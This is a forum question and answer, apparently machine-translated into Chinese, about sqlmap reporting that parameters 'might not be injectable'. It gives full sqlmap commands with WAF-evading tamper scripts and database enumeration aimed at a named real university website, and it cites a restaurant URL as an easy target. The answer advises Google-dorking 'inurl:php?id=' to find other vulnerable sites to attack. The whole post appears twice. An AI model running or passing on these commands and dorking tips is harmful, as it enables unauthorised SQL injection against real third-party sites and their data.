SQLmap 参数 "might not be injectable"
Sqlmap parameter "might not be injectable"
我从sqlmap入手,有以下疑问:
当我尝试使用 sqlmap(试图绕过 waf)时使用此代码段:
sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?option=com_newsfeeds&view=newsfeed&id=1&feedid=1&Itemid=18" --dbs --dbms=mysql --time-sec=10 --hex --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
或者这个:
sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?view=article&catid=35:pagina-principal&id=44:inicio-central&format=pdf" --dbs --dbms=mysql --time-sec=10 --hex --string --regexp --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
我看到控制台中出现:
[警告] 启发式(基本)测试表明 GET 参数 'option' 可能无法注入
[警告] 启发式(基本)测试表明 GET 参数 'view' 可能无法注入
还试图在我的网站中找到类似于:http://www.cafe53rd.com/menu.php?item_id=3 的 url
因为我检查过这种 url 最容易访问,但我无法在我正在审核的网站上找到它。
下面的正确代码是什么Site ("http://prefing...")
抱歉我的英语不好。
非常感谢。
这个错误只是表明正在执行的注入技术类型没有给出积极的回应。
我已经面对它并通过获得替代 link 解决了它。
我建议使用搜索 inurl:php?id= 找到其他一些易受攻击的 links ,然后将 link 插入 sqlmap.
我从sqlmap入手,有以下疑问: 当我尝试使用 sqlmap(试图绕过 waf)时使用此代码段:
sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?option=com_newsfeeds&view=newsfeed&id=1&feedid=1&Itemid=18" --dbs --dbms=mysql --time-sec=10 --hex --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
或者这个:
sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?view=article&catid=35:pagina-principal&id=44:inicio-central&format=pdf" --dbs --dbms=mysql --time-sec=10 --hex --string --regexp --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
我看到控制台中出现:
[警告] 启发式(基本)测试表明 GET 参数 'option' 可能无法注入 [警告] 启发式(基本)测试表明 GET 参数 'view' 可能无法注入
还试图在我的网站中找到类似于:http://www.cafe53rd.com/menu.php?item_id=3 的 url 因为我检查过这种 url 最容易访问,但我无法在我正在审核的网站上找到它。
下面的正确代码是什么Site ("http://prefing...")
抱歉我的英语不好。 非常感谢。
这个错误只是表明正在执行的注入技术类型没有给出积极的回应。 我已经面对它并通过获得替代 link 解决了它。 我建议使用搜索 inurl:php?id= 找到其他一些易受攻击的 links ,然后将 link 插入 sqlmap.